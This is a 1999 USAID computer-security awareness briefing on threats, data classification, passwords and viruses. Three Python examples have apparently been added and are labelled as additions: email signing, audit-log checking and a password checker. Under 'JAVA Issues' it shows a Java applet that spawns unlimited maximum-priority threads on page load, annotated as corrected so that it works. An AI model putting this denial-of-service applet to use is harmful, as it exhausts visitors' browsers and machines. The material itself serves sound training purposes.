AIS Security Brief

Information Security
USER AWARENESS TRAINING
1999
by Bill Cleveland
INFORMATION SECURITY STAFF
USAID Information Systems Security Officer
 Jim Craft
<jcraft@usaid.gov> (202) 712-4559
Senior Security Consultants:
 Mike Fuksa <mfuksa@usaid.gov> (202) 712-1096
 Ante Penaso <apenaso@usaid.gov>(703) 465-7008
Security Training and Awareness Consultant
 Bill Cleveland <wcleveland@usaid.gov>
(703) 465-7054
BRIEFING OBJECTIVES
AIS SECURITY
- Why is it important?
- What is Automated Information Security / Computer Security?
- Current Issues (Threats / Vulnerabilities / Countermeasures)
- Contingency Planning
- Conclusion
- Open Discussion
Information Security
Why is it important?
COMPUTER SECURITY
Definition - Measures required to protect against unauthorized (accidental or intentional) disclosure, modification or destruction of Automated Information Systems, networks and computer resources, or denial of the service that processes data.
NUMBER ONE
- We are a computerized society
- Nearly everything we do utilizes computers
- How much data do you maintain that isn't contained on a computer somewhere?
- All computers are vulnerable
NUMBER TWO
- Much of what we compromise is done through unclassified open source publications, conventions, consortiums, patents, etc.
- All this tied together provides a pretty complete paint-by-the-numbers picture.
IN THE PAST, FEW COMPUTERS WERE AVAILABLE, AND ONLY SPECIALISTS COULD USE THEM.
TODAY, COMPUTERS ARE COMMON EQUIPMENT, AND (ALMOST) ANYONE CAN USE THEM...
HEADLINE SECURITY STORIES
"Security Breaches Up Dramatically on Milnet" - By Florence Gore
Army, Navy, Air Force and Defense Department
"Peace Activist Found Guilty of Wrecking DoD Computer" - By Eric Fredell, Special to GCN
Some computers just ask for a good whacking. In June at Vandenberg Air Force Base in California a peace activist was found destroying a computer. She gave it a right with a
Security becomes more and more work, as we all are learning.....
WHAT IS AIS SECURITY / COMPUTER SECURITY?
AIS Security
- Provides a reasonable level of protection against destruction or partial destruction of your computer systems that could result in partial or total denial of service to the system users.
- The protection of data and software from unauthorized access.
AIS SECURITY PERTAINS TO
- Physical
- Personnel
- Hardware
- Software
- Communications
- Emanations
- Administrative/Operations
- Data/Information
PHYSICAL SECURITY
Physical security is that part of security concerned with physical measures designed to safeguard personnel, to prevent unauthorized access to equipment, installations, material, and documents, and to prevent theft.
Physical security and AIS security go hand in hand.
AIS SECURITY IS COMPLEX
(Diagram: AIS SECURITY at the center, surrounded by HARDWARE, SOFTWARE, PERSONNEL, PHYSICAL, ADMIN, INFOSEC, COMSEC and TEMPEST)
IS SYSTEM = HARDWARE + SOFTWARE / DATA + PEOPLE + FACILITIES
WHY INFORMATION SECURITY?
- Mission
- Cost
- Data/Software
- Dependence
WHY? Two Reasons:
- It makes sense
- It's the law
COMPUTER SECURITY IS EVERYONE'S RESPONSIBILITY
Cooperation and support from all personnel throughout the activity is an essential key to a successful program!
- New Employees
- End Users
- End User Supervisors
DATA CLASSIFICATIONS
- CLASSIFIED (CONFIDENTIAL, SECRET, TOP SECRET)
- SENSITIVE BUT UNCLASSIFIED (TECHNICAL, PROPRIETARY, PROGRAM SPECIFIC)
- UNCLASSIFIED
DATA CLASSIFICATION
CLASSIFIED
- Confidential - Secret - Top Secret
- To access classified material: appropriate clearance level, need-to-know, and access approval
- Special handling and storage requirements
- Magnetic media may not be shredded, only burned or degaussed by an approved degausser (TS media may only be destroyed)
CLASSIFIED PROCESSING
Unless your computer has been evaluated by NSA as meeting the Trusted Computer System Evaluation Criteria (TCSEC) at class B2 (multilevel secure mode), as soon as you introduce classified data into your system, all data on all media and devices associated with the system is classified at the highest level of data contained on the system.
The system and all of its data (100%) remain classified at that level until the system has been sanitized (declassified) by use of approved methods.
DATA CLASSIFICATION
SENSITIVE BUT UNCLASSIFIED
Includes:
- For Official Use Only (FOUO)
- Privacy Act Information
- Contract Information
- Technical Information
- Budget Information
- Financial / Payroll Information
- Proprietary Information
DATA CLASSIFICATION
SENSITIVE BUT UNCLASSIFIED (Cont.)
Requires Special Handling, Storage and Destruction
- If kept on desk, turn over or store in desk, file cabinet or notebook
- Destruction must be done in such a way as to prevent reconstruction.
CURRENT ISSUES
THREATS / VULNERABILITIES / COUNTERMEASURES
THREATS
- An activity, deliberate or unintentional, with the potential for causing harm to an Automated Information System
- Manifestation of a threat results in degraded mission accomplishment
- Threat identification includes both known threats and reliably postulated threats. Lack of evidence does not rule out the existence of a threat
CATEGORIES OF THREATS
- Man-Made, Intentional: Viruses, Espionage, Sharing Passwords, Inadequate Backups
- Man-Made, Unintentional: Accidental Power Loss, Forgetting Password, Unattended Terminal Display, Food/Drinks
- Natural: Hurricane, Fire, Flood, Earthquake
SOME AIS SECURITY THREATS
- Fire
- Flood / Water Damage
- Wind Damage
- Snow / Ice Storms
- Power Loss
- Unauthorized Access
- Espionage
- Food / Drinks
- Sabotage
- Unauthorized Software / Data Modification
- System / Application Programmer Errors
- Operator/User Errors and Omissions
- Communications Failure
- Fraud and Abuse
JAVA Issues - Denial of service
(Hostile applet example: it spawns threads without limit until the browser's JVM runs out of resources.)

    import java.applet.*;
    import java.awt.*;

    public class InfiniteThreads extends Applet implements Runnable
    {
        Thread wasteResources = null;
        boolean StopThreads = false;   // never set to true, so the loop never ends

        // Applet lifecycle entry point: the browser calls this when the page is shown,
        // and it kicks off the first runaway thread.
        public void start ()
        {
            new Thread(this).start();
        }

        public void run ()
        {
            while (!StopThreads)
            {
                // Every new thread runs this same loop, so the thread count grows without bound.
                wasteResources = new Thread(this);
                wasteResources.setPriority(Thread.MAX_PRIORITY);   // original had MAX_Priority, which does not compile
                wasteResources.start();   // original called run(), which recurses on the current thread instead of spawning a new one
            }
        }
    }
Web Spoofing
- Easy to do
- Spectacular effect
- Impossible to prevent
- Forewarned is forearmed!!!!!
E-mail Spoofing
- Forge a false e-mail
- Easy to do
- Impossible to prevent
- Countermeasures: authenticate; sign internal messages
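The two points above, that forging the From: line is trivial and that signing internal messages is the countermeasure, as an added example that is not part of the original briefing. The addresses, subjects and bodies are constructed, the header name X-Internal-Signature is an assumption, and an HMAC over a shared secret stands in for a real signature scheme such as PGP or S/MIME so that the block runs with the standard library alone.

```python
"""Added example (not from the original briefing): a forged From: header is
trivial to produce, and signing internal messages lets the recipient detect
it. Addresses, bodies, the header name and the shared key are constructed."""
import base64
import hashlib
import hmac
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed shared secret known only to the internal mail gateway and the
# recipient; a real deployment would use per-user PGP or S/MIME keys instead.
INTERNAL_KEY = b"constructed-demo-key-do-not-reuse"
SIG_HEADER = "X-Internal-Signature"   # assumed header name


def _canonical(msg) -> bytes:
    """The bytes the tag covers: the headers a spoofer forges, plus the body."""
    parts = [str(msg.get("From", "")), str(msg.get("To", "")),
             str(msg.get("Subject", "")), msg.get_content()]
    return "\n".join(parts).encode("utf-8")


def _tag(msg, key: bytes) -> str:
    digest = hmac.new(key, _canonical(msg), hashlib.sha256).digest()
    return base64.b64encode(digest).decode("ascii")


def build_message(sender, recipient, subject, body) -> EmailMessage:
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


def sign_message(msg: EmailMessage, key: bytes = INTERNAL_KEY) -> EmailMessage:
    """Attach an HMAC-SHA256 tag over From/To/Subject/body."""
    if SIG_HEADER in msg:
        del msg[SIG_HEADER]
    msg[SIG_HEADER] = _tag(msg, key)
    return msg


def verify_message(raw: bytes, key: bytes = INTERNAL_KEY) -> bool:
    """True only if the message carries a tag matching its current headers and body."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    tag = msg.get(SIG_HEADER)
    if tag is None:
        return False            # unsigned: treat as untrusted
    return hmac.compare_digest(str(tag).strip(), _tag(msg, key))


def forge_from(raw: bytes, fake_sender: str) -> bytes:
    """What a spoofer does: rewrite From: and leave everything else alone."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    del msg["From"]
    msg["From"] = fake_sender
    return msg.as_bytes()


def demo() -> dict:
    legit = sign_message(build_message("isso@example.gov", "user@example.gov",
                                       "Password reset", "Please call the help desk."))
    raw = legit.as_bytes()
    # Anyone with an SMTP client can put the ISSO's address in From:, but
    # without the key cannot produce a tag, so the forgery does not verify.
    forgery = build_message("isso@example.gov", "user@example.gov",
                            "Password reset", "Reply with your password.").as_bytes()
    # Replaying a genuine signed message under another From: fails too,
    # because From: is covered by the tag.
    rewritten = forge_from(raw, "director@example.gov")
    return {"legitimate": verify_message(raw),
            "unsigned_forgery": verify_message(forgery),
            "header_rewritten": verify_message(rewritten)}
```

The check only helps if unsigned mail that claims an internal sender is treated as untrusted, which is why verify_message returns False for a missing tag rather than skipping the check; with a shared secret any holder of the key can also forge, so the public-key schemes named on the slide are the real fix.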
Social Engineering
- Easy to do
- Easy to prevent
- Don't share passwords
(Cartoon: "Userid: mreiter, password: mreiter. Share my system!" - WRONG!)
COMPUTER VIOLATIONS, FRAUD, AND ABUSE
No one here would ever do that! Would they?
- 70 - 80% of annual loss related to computers is committed by employees
- 20% of the total computer-related loss is committed by disgruntled employees
- 60% of the total computer-related loss is caused through human errors or accidents
FLASH: Disgruntled employee sabotages classified AIS Systems
FLASH: 15 Computers have been destroyed by negligence
THREATS - IMPACTS ON COMPUTER RESOURCES
- Destruction
- Modification
- Disclosure
- Denial of Service
(Cartoon: "How will I ever get my work done now!!!!!!")
THREAT - VIRUS
- Run antivirus programs on a regular basis.
- Do not use any outside floppies/disks on your system without running a virus scan first. Many viruses are introduced because virus scanning was not performed.
- No illegal duplication of software rule - this reduces the spread of viruses and avoids legal headaches.
(Cartoon: a disk labelled "NEAT GAME")
VULNERABILITY
A vulnerability is a flaw or weakness that may be exploited by a threat agent to cause harm to an AIS system or network.
SOME VULNERABILITIES
- Open Building / Room Policy
- Disgruntled Employees
- Lack of Security Awareness
- Inadequate Supervision
- Software / Hardware
THREAT / VULNERABILITY
Data Alteration, Outside Access - This is why audit trails are so important. Check data processing against tasking and logged computer time for suspicious discrepancies.
In the case where laptops/portables are used by multiple users, keep a written log of who checked it out and when it was returned.
(Sample checkout log sheet: Toshiba Laptop, MINOR 109999, with NAME and DATE columns)
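The audit-trail check the slide describes (logged computer time compared against tasking) and the laptop checkout log, as an added example that is not part of the original briefing. The log format, user names, workstation names, dates, the tasking table and the checkout sheet are all constructed for the demonstration; no real system emits exactly these lines.

```python
"""Added example (not from the original briefing): compare an audit trail
against tasking, and check a laptop checkout sheet for gaps. All input data
below is constructed for the demonstration."""
from datetime import date, datetime, time

# Constructed audit trail: "<date> <time> <event> <user> <resource>".
AUDIT_LOG = """\
1999-03-02 08:05 LOGIN jdoe WS-07
1999-03-02 12:10 LOGIN jdoe WS-07
1999-03-02 20:15 LOGIN jdoe WS-07
1999-03-02 09:30 LOGIN mreiter WS-12
1999-03-02 09:35 MODIFY mreiter PAYROLL.DBF
1999-03-02 22:40 LOGIN mreiter WS-12
1999-03-03 10:00 LOGIN tjones WS-03
"""

# Constructed tasking: (user, date) -> (start, end) of the hours they were
# scheduled to work. A user missing for a date had no tasking that day.
TASKING = {
    ("jdoe", date(1999, 3, 2)): (time(8, 0), time(17, 0)),
    ("mreiter", date(1999, 3, 2)): (time(9, 0), time(18, 0)),
}

# Constructed laptop checkout sheet, as the slide suggests keeping:
# "<asset> <user> <checked out> <returned or ->".
CHECKOUT_LOG = """\
MINOR-109999 jdoe 1999-03-01 1999-03-02
MINOR-109999 mreiter 1999-03-02 -
MINOR-109999 tjones 1999-03-03 -
"""


def parse_audit(text: str):
    """Yield (timestamp, event, user, resource) for each non-empty log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        d, t, event, user, resource = line.split()
        yield datetime.strptime(f"{d} {t}", "%Y-%m-%d %H:%M"), event, user, resource


def find_discrepancies(log_text: str = AUDIT_LOG, tasking: dict = TASKING) -> list:
    """Flag activity by users who were not tasked that day, or outside their tasked hours."""
    findings = []
    for when, event, user, resource in parse_audit(log_text):
        window = tasking.get((user, when.date()))
        if window is None:
            findings.append(f"{when:%Y-%m-%d %H:%M} {user}: {event} on {resource} "
                            f"with no tasking that day")
        elif not (window[0] <= when.time() <= window[1]):
            findings.append(f"{when:%Y-%m-%d %H:%M} {user}: {event} on {resource} "
                            f"outside tasked hours {window[0]:%H:%M}-{window[1]:%H:%M}")
    return findings


def outstanding_checkouts(sheet: str = CHECKOUT_LOG) -> list:
    """Flag a laptop checked out again while the previous checkout was never returned:
    either the sheet was not kept, or the machine changed hands untracked."""
    findings = []
    holder = {}   # asset -> user currently recorded as holding it
    for line in sheet.splitlines():
        if not line.strip():
            continue
        asset, user, out_date, returned = line.split()
        if asset in holder:
            findings.append(f"{asset}: checked out to {user} on {out_date} "
                            f"while still out to {holder[asset]}")
        if returned == "-":
            holder[asset] = user
        else:
            holder.pop(asset, None)
    return findings
```

On the constructed data the audit check flags the two after-hours logins and the user with no tasking, and the checkout check flags the laptop being handed to a third person while the sheet still shows it out to the second. The point of comparing against tasking rather than against fixed office hours is that a legitimate late shift is not an alarm while a login on an untasked day is.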
THREAT / VULNERABILITY RELATIONSHIP
(Cartoon: "Hey man, this base is great! Not too many guards and the shoreline and many buildings are open. This place is easy! Alert our protest group, we're on tonight.")
Sabotage (Threat)
Possible Vulnerabilities:
- Disgruntled Employee(s)
- Activists / Protesters
- Inadequate Building Access Control
SAFEGUARDS / COUNTERMEASURES
Any action, device, procedure, technique or other measure that reduces the vulnerability of a system.
Examples:
- Security Operating Procedures
- Fire/Smoke Alarms
- Intrusion Detection System
- Firewall
- Awareness Training
IN CONCLUSION
COMMON STATEMENTS #1
"Aw come on, it's only a Personal Computer"
It's-Only-a-Personal-Computer Facts
- But it still requires safeguarding
- Many have more capacity and capabilities than some of the mainframes in our inventory.
- The only small features are their physical size, the cost, and their security features.
COMMON STATEMENTS #2
WE HAVE TO TRUST OUR PEOPLE...
(Cartoon: "I see a computer, tell me the password so I can check it for you.")
(Cartoon: "Hi, I downloaded those programs from my PC like you wanted. I'm at my car getting ready to drive over now. See you soon.")
WE HAVE TO TRUST OUR PEOPLE
We like to think we can - but always remember to check on and report suspicious activities.
- Be on the lookout for people who you do not recognize in your environment.
- If you see persons without badges, challenge them.
- If you hear someone talking about things they shouldn't be, let them know. If they continue, report it.
COMMON STATEMENT #3
"We only process Unclassified on our PCs....."
WE ONLY PROCESS UNCLASSIFIED ON OUR PCs....
However, if it's private information, it is considered SENSITIVE BUT UNCLASSIFIED and must be treated as such.
(Picture: a Software Trouble Report form)
If your system is accredited for Unclassified, that is all you are allowed to process. You must be accredited for classified processing in order to use your computer for classified work.
OPEN DISCUSSION
SECURITY POP QUIZ
WHAT'S WRONG HERE? (Picture shows a password: P3D4Oh$)
WHAT'S THE PROBLEM HERE??
PASSWORD DON'TS:
- DO NOT USE ANY PERSONAL NAMES, NICKNAMES, PLACES, BIRTHDAYS, ETC. FOR YOUR PASSWORD.
- DO NOT USE ANYTHING THAT CAN BE TRACED BACK TO YOU (E.G. AUTO LICENSE NUMBER, BANK ACCOUNT NUMBERS, ANNIVERSARY DATE).
- DO NOT USE ANYTHING THAT HAS TO DO WITH YOUR PROFESSION (E.G. JOB TITLE, DEGREE, ETC.).
- DO NOT USE THE SAME PASSWORD FOR ALL SYSTEMS.
PASSWORD DO'S:
- USE CHARACTERS WITH NUMBERS AND PUNCTUATION.
- INTERSPERSE CAPITALS WITH LOWER CASE (EX: Aih4B/3).
- DO USE, IF POSSIBLE, AT LEAST SEVEN CHARACTERS IN YOUR PASSWORD.
- DO CHANGE YOUR PASSWORD REGULARLY.
**REMEMBER - IF YOU SUSPECT YOUR PASSWORD HAS BEEN COMPROMISED, REPORT IT IMMEDIATELY TO A SYSTEM ADMINISTRATOR.
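The DON'Ts and DO's above as a checker, added here as an example that is not part of the original briefing. The personal-detail list and the sample passwords are constructed; a real checker would take them from the user's record. Rules that cannot be judged from the password string alone (change it regularly, report a suspected compromise) are left out, and the "same password for all systems" rule is checked only against passwords the caller supplies.

```python
"""Added example (not from the original briefing): check a candidate password
against the slide's rules. Personal details and sample inputs are constructed."""
import re
import string

PUNCTUATION = set(string.punctuation)
MIN_LENGTH = 7   # slide: "at least seven characters"


def _compact(s: str) -> str:
    """Lower-case and drop separators, so 'Anniversary 6/14/90' also catches '61490'."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def check_password(password: str, userid: str, personal: tuple = (),
                   used_elsewhere: tuple = ()) -> list:
    """Return the list of rule violations; an empty list means the password passes.

    personal:       names, nicknames, places, job titles, plate numbers, dates and
                    anything else traceable to the user (the slide's DON'Ts).
    used_elsewhere: passwords the user already uses on other systems.
    """
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.islower() for c in password) or not any(c.isupper() for c in password):
        problems.append("does not intersperse capitals with lower case")
    if not any(c.isdigit() for c in password):
        problems.append("contains no numbers")
    if not any(c in PUNCTUATION for c in password):
        problems.append("contains no punctuation")
    # The userid itself counts as traceable, as in the "mreiter / mreiter" cartoon.
    candidates = [("userid", userid)] + [("personal detail", p) for p in personal]
    flat = _compact(password)
    for label, value in candidates:
        needle = _compact(value)
        if len(needle) >= 3 and needle in flat:
            problems.append(f"contains {label} '{value}'")
    if password in used_elsewhere:
        problems.append("same password used on another system")
    return problems
```

The slide's own examples pass (P3D4Oh$ and Aih4B/3 have seven characters, mixed case, a digit and punctuation), while the cartoon's password for user mreiter fails on four counts at once. Composition rules of this kind catch the obvious mistakes the slide lists; they do not by themselves make a password hard to guess, which is why the sharing and reuse rules matter as much as the character mix.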
WHAT'S WRONG HERE? (Picture: soda cans next to the equipment, beside a "Visitor Escort Req'd" sign)
Protect Your Equipment
- You should always try to protect your equipment from situations that can cause damage, i.e. extreme heat, smoke, a leaky roof, etc.
- Do not drink or eat around your equipment. Many keyboards have had to be replaced due to drinks being spilled. (If a computer system is on your desk, please keep any food or drink away from it.)
- When working on classified, protect your screen from unauthorized viewing.
- Virus prevention: install and run an anti-virus program often. Do not use any "foreign" magnetic media without running a virus scan on it first.
WHAT'S WRONG HERE?
(Cartoon: "Check out the neat software I brought in. My friend gave it to me. He got it at work. He said it hasn't got a virus on it, so we don't need to scan it." "COOL, LET'S RUN IT!")
Copyrighted, Licensed or Proprietary Information / Downloading Files:
When downloading files from the Internet for use in official business, there are legal considerations, as well as concerns such as the introduction of viruses, bugs or other ill effects.
- Registration cannot be required with the understanding that it may be used for commercial purposes. In particular, the Government may not be later identified as a user of the software or otherwise presented as endorsing the program.
- Software download must not obligate the Government to provide anything in return. In the case of beta software, there cannot be any requirement for the Government to submit an evaluation report in return for the download.
- Registration cannot be required with any expectation that the Government may later be obligated to purchase a copy of the software.
- Finally, where registration carries terms for nondisclosure and use of the software, the downloader must take care not to breach any of its terms. (For example, in situations where a program is found to be beneficial, the software may not be simply duplicated and distributed to others if registration is required from each individual user. On the other hand, if a program is found not to be of use, the downloader must take appropriate steps to remove and/or destroy the software.)
- All users who download files for PC access should have a virus scan run prior to usage.
- Remember to run a virus scan on disks and floppies received from outside our Department. Many viruses have been passed from Department to Department because no one ran a virus scan. If you need assistance contact the ISSO, or Asst. ISSO.
- And don't forget that use of LANs to domains outside is for Official Business Only. This is a monitored service, and any misuse is subject to disciplinary action or loss of access.
It's Over (FINITO / Fertig: finished)
(Please go back to work now. No running please, single file, no
pushing or shoving. Yes, you may hold hands with the one behind
you. Don’t try to be the first one out if it requires pushing
someone else out of your way. Take nothing but the knowledge
with you, leave nothing but empty seats. Thank you very much.
That’s all I can say, so have a nice day.)